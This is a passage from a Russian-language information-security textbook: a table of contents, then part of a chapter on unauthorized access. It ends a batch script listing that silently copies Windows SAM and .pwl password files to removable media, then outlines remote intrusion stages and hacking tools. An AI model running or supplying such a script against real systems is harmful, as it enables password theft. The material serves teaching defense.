- •Методы и средства защиты информации
- •Российская разведка
- •Радиоразведка во время Второй мировой войны
- •Разведка конца ХХ века
- •Советские спецслужбы
- •КГБ СССР
- •ГРУ ГШ ВС СССР
- •Спецслужбы США
- •РУМО (DIA)
- •НУВКР (NRO)
- •НАГК (NIMA)
- •Спецслужбы Израиля
- •Моссад
- •Аман
- •Спецслужбы Великобритании
- •MI5 (Security Service)
- •ЦПС (GCHQ)
- •Спецслужбы ФРГ
- •Спецслужбы Франции
- •ДГСЕ (DGSE)
- •Роль средств технической разведки в XXI веке
- •Сигнал и его описание
- •Сигналы с помехами
- •Излучатели электромагнитных колебаний
- •Низкочастотные излучатели
- •Высокочастотные излучатели
- •Оптические излучатели
- •Образование радиоканалов утечки информации
- •Оценка электромагнитных полей
- •Аналитическое представление электромагнитной обстановки
- •Обнаружение сигналов в условиях воздействия непреднамеренных помех
- •Оценка параметров сигналов в условиях воздействия непреднамеренных помех
- •Физическая природа, среда распространения и способ перехвата
- •Заходовые методы
- •Перехват акустической информации с помощью радиопередающих средств
- •Перехват акустической информации с помощью ИК передатчиков
- •Закладки, использующие в качестве канала передачи акустической информации сеть 220 В и телефонные линии
- •Диктофоны
- •Проводные микрофоны
- •“Телефонное ухо”
- •Беззаходовые методы
- •Аппаратура, использующая микрофонный эффект телефонных аппаратов
- •Аппаратура ВЧ навязывания
- •Стетоскопы
- •Лазерные стетоскопы
- •Направленные акустические микрофоны (НАМ)
- •Физические преобразователи
- •Характеристики физических преобразователей
- •Виды акустоэлектрических преобразователей
- •Индуктивные преобразователи
- •Микрофонный эффект электромеханического звонка телефонного аппарата
- •Микрофонный эффект громкоговорителей
- •Микрофонный эффект вторичных электрочасов
- •Паразитные связи и наводки
- •Паразитные емкостные связи
- •Паразитные индуктивные связи
- •Паразитные электромагнитные связи
- •Паразитные электромеханические связи
- •Паразитные обратные связи через источники питания
- •Утечка информации по цепям заземления
- •Радиационные и химические методы получения информации
- •Классификация каналов и линий связи
- •Взаимные влияния в линиях связи
- •Виды и природа каналов утечки информации при эксплуатации ЭВМ
- •Анализ возможности утечки информации через ПЭМИ
- •Способы обеспечения ЗИ от утечки через ПЭМИ
- •Механизм возникновения ПЭМИ средств цифровой электронной техники
- •Техническая реализация устройств маскировки
- •Устройство обнаружения радиомикрофонов
- •Обнаружение записывающих устройств (диктофонов)
- •Физические принципы
- •Спектральный анализ
- •Распознавание событий
- •Многоканальная фильтрация
- •Оценка уровня ПЭМИ
- •Метод оценочных расчетов
- •Метод принудительной активизации
- •Метод эквивалентного приемника
- •Методы измерения уровня ПЭМИ
- •Ближняя зона
- •Дальняя зона
- •Промежуточная зона
- •Средства проникновения
- •Устройства прослушивания помещений
- •Радиозакладки
- •Устройства для прослушивания телефонных линий
- •Методы и средства подключения
- •Методы и средства удаленного получения информации
- •Дистанционный направленный микрофон
- •Системы скрытого видеонаблюдения
- •Акустический контроль помещений через средства телефонной связи
- •Перехват электромагнитных излучений
- •Классификация
- •Локальный доступ
- •Удаленный доступ
- •Сбор информации
- •Сканирование
- •Идентификация доступных ресурсов
- •Получение доступа
- •Расширение полномочий
- •Исследование системы и внедрение
- •Сокрытие следов
- •Создание тайных каналов
- •Блокирование
- •Помехи
- •Намеренное силовое воздействие по сетям питания
- •Технические средства для НСВ по сети питания
- •Вирусные методы разрушения информации
- •Разрушающие программные средства
- •Негативное воздействие закладки на программу
- •Сохранение фрагментов информации
- •Перехват вывода на экран
- •Перехват ввода с клавиатуры
- •Перехват и обработка файловых операций
- •Разрушение программы защиты и схем контроля
- •Показатели оценки информации как ресурса
- •Классификация методов и средств ЗИ
- •Семантические схемы
- •Некоторые подходы к решению проблемы ЗИ
- •Общая схема проведения работ по ЗИ
- •Классификация технических средств защиты
- •Технические средства защиты территории и объектов
- •Акустические средства защиты
- •Особенности защиты от радиозакладок
- •Защита от встроенных и узконаправленных микрофонов
- •Защита линий связи
- •Методы и средства защиты телефонных линий
- •Пассивная защита
- •Приборы для постановки активной заградительной помехи
- •Методы контроля проводных линий
- •Защита факсимильных и телефонных аппаратов, концентраторов
- •Экранирование помещений
- •Защита от намеренного силового воздействия
- •Защита от НСВ по цепям питания
- •Защита от НСВ по коммуникационным каналам
- •Основные принципы построения систем защиты информации в АС
- •Программные средства защиты информации
- •Программы внешней защиты
- •Программы внутренней защиты
- •Простое опознавание пользователя
- •Усложненная процедура опознавания
- •Методы особого надежного опознавания
- •Методы опознавания АС и ее элементов пользователем
- •Проблемы регулирования использования ресурсов
- •Программы защиты программ
- •Защита от копирования
- •Программы ядра системы безопасности
- •Программы контроля
- •Основные понятия
- •Немного истории
- •Классификация криптографических методов
- •Требования к криптографическим методам защиты информации
- •Математика разделения секрета
- •Разделение секрета для произвольных структур доступа
- •Определение 18.1
- •Линейное разделение секрета
- •Идеальное разделение секрета и матроиды
- •Определение 18.3
- •Секретность и имитостойкость
- •Проблема секретности
- •Проблема имитостойкости
- •Безусловная и теоретическая стойкость
- •Анализ основных криптографических методов ЗИ
- •Шифрование методом подстановки (замены)
- •Шифрование методом перестановки
- •Шифрование простой перестановкой
- •Усложненный метод перестановки по таблицам
- •Усложненный метод перестановок по маршрутам
- •Шифрование с помощью аналитических преобразований
- •Шифрование методом гаммирования
- •Комбинированные методы шифрования
- •Кодирование
- •Шифрование с открытым ключом
- •Цифровая подпись
- •Криптографическая система RSA
- •Необходимые сведения из элементарной теории чисел
- •Алгоритм RSA
- •Цифровая (электронная) подпись на основе криптосистемы RSA
- •Стандарт шифрования данных DES
- •Принцип работы блочного шифра
- •Процедура формирования подключей
- •Механизм действия S-блоков
- •Другие режимы использования алгоритма шифрования DES
- •Стандарт криптографического преобразования данных ГОСТ 28147-89
- •Аналоговые скремблеры
- •Аналоговое скремблирование
- •Цифровое скремблирование
- •Критерии оценки систем закрытия речи
- •Классификация стеганографических методов
- •Классификация стегосистем
- •Безключевые стегосистемы
- •Определение 20.1
- •Стегосистемы с секретным ключом
- •Определение 20.2
- •Стегосистемы с открытым ключом
- •Определение 20.3
- •Смешанные стегосистемы
- •Классификация методов сокрытия информации
- •Текстовые стеганографы
- •Методы искажения формата текстового документа
- •Синтаксические методы
- •Семантические методы
- •Методы генерации стеганограмм
- •Определение 20.4
- •Сокрытие данных в изображении и видео
- •Методы замены
- •Методы сокрытия в частотной области изображения
- •Широкополосные методы
- •Статистические методы
- •Методы искажения
- •Структурные методы
- •Сокрытие информации в звуковой среде
- •Стеганографические методы защиты данных в звуковой среде
- •Музыкальные стегосистемы
Удаленный доступ 225
arj.exe e files.arj >nul arj.exe e files.a01 -y >nul
A:\smartdrv.exe >nul del files.a* >nul
md %RAMD%:\sec >nul cd sec >nul
md disks >nul cd disks >nul
ldir c: /s > c.txt ldir d: /s > d.txt
Окончание листинга 13.1
cd \
ntfspro.exe >nul cd sec\disks
dir c: /s >> c.txt dir d: /s >> d.txt cd..
md c md d
copy /b c:\winnt\system32\config\sam %RAMD%:\sec\c >nul copy /b d:\winnt\system32\config\sam %RAMD%:\sec\d >nul copy /b c:\windows\system32\config\sam %RAMD%:\sec\c >nul copy /b d:\windows\system32\config\sam %RAMD%:\sec\d >nul copy /b c:\windows\*.pwl %RAMD%:\sec\c >nul
copy /b d:\windows\*.pwl %RAMD%:\sec\d >nul cd \
arj.exe a -r -v1200 dirs.arj %RAMD%:\sec -y >nul copy %RAMD%:\dirs.arj a:\
copy %RAMD%:\dirs.a01 a:\
Удаленный доступ
В отличие от локального доступа, палитра методов и средств несанкционированного получения информации из АС при удаленном доступе значительно шире и достаточно сильно зависит от используемой операционной системы (ОС), настройки параметров безопасности и т.п. Как ни парадоксально, но наиболее защищенными (с некоторыми оговорками) при удаленном доступе являются АС, работающие под управлением операционных систем, которые наибольше всего уязвимы при локальном доступе, например Windows 98. Однако это противоречие только кажущееся. Действительно, системы типа
226 Глава 13. Методы и средства несанкционированного получения...
MS DOS или Windows 98 изначально не проектировались для работы в сетях. Поэтому в них практически отсутствуют развитые средства удаленного доступа, а имеющиеся средства представляют собой внешние по отношению к ядру таких систем модули, слабо интегрированные с остальными компонентами подобных простейших ОС. Поэтому, если пользователь АС, работающей под управлением такой ОС, как Windows 98, соблюдает простейшие правила безопасности (например, не предоставляет доступ по сети к файлам и папкам своего компьютера), его система обладает высокой степенью устойчивости ко взлому.
С другой стороны, большинство Unix-подобных операционных систем изначально проектировались и развивались именно как сетевые операционные системы. Поэтому такие системы часто для обеспечения безопасной работы в сетях требуют тщательной настройки параметров безопасности.
Следует заметить, что за редким исключением (например, таким, как ОС OpenBSD), большинство современных ОС при настройке параметров, принятых по умолчанию, являются небезопасными с точки зрения работы в компьютерных сетях.
Поскольку полное описание методов и средств несанкционированного получения информации из АС при удаленном доступе может занять объем, значительно превышающий объем данной книги, мы лишь вкратце рассмотрим основные из них, используя для этого схему удаленного проникновения в АС, которой пользуется большинство злоумышленников (рис. 13.2).
Рис. 13.2. Типовая схема несанкционированного получения информации из АС при удаленном доступе
Сбор информации
На этапе сбора информации злоумышленник определяет пул IP-адресов АС организации, доступных из сети общего пользования. Строго говоря, этапы сбора информации, сканирования, идентификации доступных ресурсов и, в какой-то мере, получения доступа могут предприниматься не злоумышленниками, а обычными пользователями (хотя, конечно, трудно назвать “обычным” пользователя, который сканирует все открытые порты АС, чтобы всего-навсего отправить сообщение электронной почты). Только совокупность этих операций с соблюдением некоторых условий (например, массированное не-
Удаленный доступ 227
однократное сканирование всего пула IP-адресов организации с попытками установления соединений на все открытые порты) может говорить о предпринимающихся попытках несанкционированного получения информации.
Каждая же из указанных операций сама по себе не является чем-то из ряда вон выходящим. Именно поэтому в комплект поставки многих современных сетевых ОС входят инструментальные средства, призванные обеспечить выполнение соответствующих задач, в частности, сбора информации.
К таким средствам относятся стандартные утилиты Unix whois, traceroute (в Windows — tracert), nslookup, host, и их аналоги, портированные в другие ОС, а также другие подобные средства, обладающие более дружественным интерфейсом
(Web-ориентированные варианты whois, VisualRoute, Sam Spade и т.п.).
С помощью таких вполне безобидных средств можно выяснить:
•тип сетевого подключения организации (единичный компьютер, сеть класса C, сеть класса B);
•имена и адреса серверов доменных имен (DNS — Domain Name System), обеспечивающих трансляцию символьных имен в IP-адреса по запросам АС организации;
•сеть, в которой установлены подключенные к Internet АС организации (сеть провайдера, прямое подключение и т.п.);
•схему подключения маршрутизаторов и брандмауэров;
•реальные имена, телефоны и адреса электронной почты администратора подключения;
•схему распределения IP-адресов внутри сети организации и имена отдельных узлов (с помощью так называемого переноса зоны с помощью утилиты nslookup).
Если сеть организации достаточно обширна и в ней имеется множество компьюте-
ров, подключенных к Internet, тщательно проведенный сбор информации может дать много других интересных для злоумышленника сведений. Чем тщательнее проведен предварительный сбор информации, тем выше вероятность успешного проникновения в АС интересующей злоумышленника организации.
Сканирование
Составив предварительную схему сети и наметив предварительный перечень наиболее уязвимых ее узлов, злоумышленник, как правило, переходит к сканированию. Сканирование позволяет выявить реально работающие АС исследуемой организации, доступные по Internet, определить тип и версию ОС, под управлением которых они работают, а также получить перечни портов TCP и UDP, открытых на выявленных АС.
Для проведения сканирования в распоряжении злоумышленника имеется широкий спектр инструментальных средств, начиная от простейшей утилиты ping, входящей в комплект поставки всех современных ОС, и заканчивая специализированными хакерскими ин-
струментами, такими, как fping, Pinger, icmpenum, nmap, strobe, netcat, NetScantTools Pro 2000, SuperScan, NTOScanner, WinScan, ipeye, Windows UDP Port Scanner, Cheops
имножествомдругих.
228 Глава 13. Методы и средства несанкционированного получения...
Вооружившись этими или подобными инструментами, злоумышленник может уточнить составленную на предыдущем этапе схему сети и выбрать АС, на которые следует обратить внимание в первую, вторую и т.д. очереди.
Идентификация доступных ресурсов
Очертив круг АС организации, которые представляют собой для злоумышленника наибольший интерес, он переходит к следующему этапу — идентификации доступных ресурсов. В большинстве современных сетевых ОС для решения подобных задач имеется целый ряд инструментальных средств, таких, например, как команды net, nbtstat
и nbtscan в Windows NT/2000/XP и telnet, finger, rwho, rusers, rpcinfo и rpcdump в Unix. Кроме того, злоумышленнику могут пригодиться такие утилиты, как nltest, rmtshare, srvcheck, srvinfo и snmputil (Windows NT/2000/XP Resource Toolkit), а также хакерские утилиты DumpSec, Legion, NAT, enum, user2sid, sid2user и netcat.
Тщательно проведенная идентификация доступных ресурсов выбранной для несанкционированного доступа АС может дать злоумышленнику информацию о доступных по сети дисках и папках, о пользователях и группах, имеющих доступ к данной АС, а также о выполняющихся на этой АС приложениях, включая сведения об их версиях.
Подготовившись таким образом, злоумышленник либо принимает решение о проведении попытки получения несанкционированного доступа, либо выбирает в качестве “жертвы” другую АС организации.
Получение доступа
Если принято решение о попытке проникновения, злоумышленник переходит к стадии активных действий, которые, как правило, выходят за рамки простого любопытствах, а в отдельных случаях могут уже квалифицироваться как уголовно наказуемые деяния.
Целью операций, предпринимаемых на данном этапе, является получение доступа на уровне легального пользователя АС или ОС. К таким операциям относятся:
•перехват паролей;
•подбор паролей для доступа к совместно используемым сетевым ресурсам;
•получение файла паролей;
•использование программ взлома, обеспечивающих интерактивный доступ к АС путем перевода работающих на АС приложений в нештатный режим.
Часто для получения доступа злоумышленники прибегают к социальному инжинирингу, побуждая пользователей тем или иным способом установить на своих АС программные закладки, действующие по принципу “Троянского коня”. Если это им удается, например, путем установки таких закладок, как Back Orifice или SubSeven, дальнейшее получение доступа к таким АС для злоумышленников не составляет труда.
В тех случаях, когда злоумышленник по каким-то причинам не может или не намерен манипулировать пользователями, ему приходиться обеспечивать получение доступа